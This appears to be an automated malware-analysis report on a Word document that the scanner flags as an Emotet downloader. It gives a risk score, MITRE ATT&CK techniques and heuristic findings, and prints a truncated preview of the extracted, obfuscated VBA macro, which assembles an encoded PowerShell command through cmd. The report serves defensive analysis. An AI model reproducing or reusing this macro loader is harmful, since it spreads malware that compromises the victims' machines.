MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro is designed to execute a PowerShell command, likely to download and run a second-stage payload. The ClamAV detection explicitly identifies it as an Emotet downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6665583-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6665583-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 47843 bytes |
SHA-256: 2683ea7b7f57a04bee3dbf536cd3e19dd03bf86d356cfb3f6c86bca3060f9c40 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hRUqcQoBkNYFNI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "kRVAHCArdmdTno"
Function cRPBonHMM()
On Error Resume Next
IsArray 50799 - mtwwZ / 82836 - YiDMim
IsArray CDbl(biMHIl)
OQRfGp = "md " + "/v^ ^" + " /r" + " " + CStr(Chr(jMdnvXoNo + WEwvHvC + 34 + skLtFpoJzPwMZX + RVwHoPNBHw)) + " " + "Se" + "t^" + " ^ ^ R"
VarType 95611 * jCXKlB - HjSDZ / ucjQI
HOzldP = Second(9724)
HOzldP = Oct(716)
PdwcNJ = "M^E=^" + "p^ow" + "^e}^s" + "h^e^{^" + "{^ -^e"
HOzldP = SXDQH * SXzwU
HOzldP = CCur(aNzCJb / WsBhS)
IsArray CDate(9)
FfZCkEl = " ^JA^BR" + "A^" + "H^o" + "^A^SQ^A" + "^9^" + "A#4A" + "^ZQ^B3A" + "^\^0" + "^"
VarType 12881 - AKhjEm + kvpQvG * jEnICL
HOzldP = bmaBNs / SvKMT
HOzldP = CCur(756)
HOzldP = wwaWVw * szQVzJ * 16884 + VbPRO
VarType Second(4)
PiFzmuJMl = "AbwB" + "^i^" + "A^" + "#^oA^" + "ZQ^B^" + "jA"
HOzldP = 30936 - mTwTi
IsArray Round(9)
VarType Tan(84060868)
RWRClCL = "^H" + "Q" + "A," + "A^B^OA#" + "U^A^" + "dAA" + "^u^A" + "^" + "$c^AZ" + "^Q" + "^BiA" + "E^:^Ab^"
HOzldP = CDate(nawAZF * UowUk)
IsArray Int(wiSLc)
HOzldP = 98772 * nOWSp + sBlTo - asjVO
VarType 29837 / VfPtXn + 99698 - SXzmVB
VarType Tan(CfupS)
IsArray CByte(55002 / VKkqZS)
pwJinLfMtw = "A^" + "B^p" + "^A" + "^#" + "^U^" + "Ab^" + "gB^0" + "^A" + ".^s"
VarType 6341 + CrJdJV
HOzldP = nHwcv + TCjNU
IsArray CDate(aDwzwh)
jJjMiEznhin = "^A" + "JAB^" + "%" + "A" + "$^,Ac^" + "wA^9A" + "\cA^aA" + "^" + "B0^" + "A"
cRPBonHMM = OQRfGp + PdwcNJ + FfZCkEl + PiFzmuJMl + RWRClCL + pwJinLfMtw + jJjMiEznhin
IsArray Second(268)
VarType CBool(8)
HOzldP = 40593 - SKQOpd
HOzldP = Rnd(DSOtXk + WtQjMv)
End Function
Function CliTiw()
On Error Resume Next
IsArray 45574 * uvBbA - Juiin * UvlFM
VarType FarKt * 419 - zbrojK - wqsiGv
HOzldP = CDate(XLOnBr)
JnDGwjYwkl = "^" + "HQAc^" + "A" + "^A^6^A" + "^\+^A" + "^L" + "^w^B^o" + "^A#" + "EA^" + "@g^B" + "h"
VarType 46557 / sLzuj / AkcsD / nXuEq
VarType Str(35643 + 65442)
HOzldP = Round(XkbrAC)
HOzldP = Tan(19778 * YdilO)
sEqdVAzIO = "^AH,^A" + "^a^QB7" + "^A^#^+A" + "^d^A" + "Bv^A^." + "^," + "A^%^AA^" + "u^" + "A#:A^bw" + "^B7A^\^" + "+" + "^A^T"
HOzldP = TypeName(33664 - rDGSi - DUkCEU / 88675)
VarType Rnd(99647 - ADRJE - 23761 / HjrVU)
IsArray CByte(PjOjIM)
ZwsLCwnXrA = "^gBoAE^" + "A^A^a^A" + "^B^0^" + "A^" + "HQ^AcAA" + "^6^A^" + "\+A^L" + "w^B^m"
IsArray mUami * XGrnD + lDJGO / 7536
GQOkzBUi = "^" + "A#^" + "U" + "Ab^" + "g^B" + "^{" + "A^H^" + "QA^d^" + "A" + "Ay^A." + "A" + "A:"
IsArray Oct(KtPXwz)
IsArray LCase(5888 - VsUMtn * 74536 - RddwaW)
rSOjbjv = "QA^4^" + "A\" + "4A@" + "^w^BvA" + "#^"
VarType CByte(EXkGQ - tWbbK)
HOzldP = Rnd(XEqisv)
VarType CDbl(SMcahD)
HOzldP = CVar(ZjDCRL * ZJVTZm - pikXOM + sQSiFb)
YjjlhpG = "0A^L" + "^" + "w^B^" + "k^AE+A" + "^@^g^B" + "nA^" + "Hg"
VarType CDate(dpEnqD)
IsArray Tan(DhSlU)
KiBPjlXQVz = "A" + "^" + "Q" + "ABoA^H" + "^" + "Q" + "^A^d^A" + "B^w^A" + ".oALw" + "^Av^A#^" + "U" + "A^@Q" + "B^zA^"
IsArray jqJrw - XvpMT + hozPB / blWCc
VarType CDate(iWbHD + 83163 * ZIFsa / YSJzik)
VarType Rnd(685)
dTkhE = "HQAZ" + "^Q" + "^B^uA" + "^#^Q^" + "AL^" + "g^"
IsArray Sin(282)
HOzldP = CkTlwi / OAKZbB * hIcRH + rXbRCT
cYHhj = "B^q" + "A^HA^A" + "^LwB^\A" + "#^wA^%" + "^Q^B}" + "AE^@A" + "^QQB^AA" + "^#^g^Ad" + "^AB^" + "0AHA^" + "A^" + "O^g^Av" + "^A"
VarType YIDPmY - kFIra
VarType PJzRpP + 41332 + GMhsf / CiiUd
LOfHzEJ = "^" + "\+A^@^" + "gB^" + "{^" + "A" + "#0^A^" + "bg^B5" + "^A^#^:A" + "Lg^Bj^" + "A#^+" + "^Ab^Q"
VarType CDate(981)
qJivjOzdCSz = "AvA^HU" + "AO" + "^AB^$A$" + "^" + ",^A^aQ" + "^B" + "KA^"
CliTiw = JnDGwjYwkl + sEqdVAzIO + ZwsLCwnXrA + GQOkzBUi + rSOjbjv + YjjlhpG + KiBPjlXQVz + dTkhE + cYHhj + LOfHzEJ + qJivjOzdCSz
HO
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.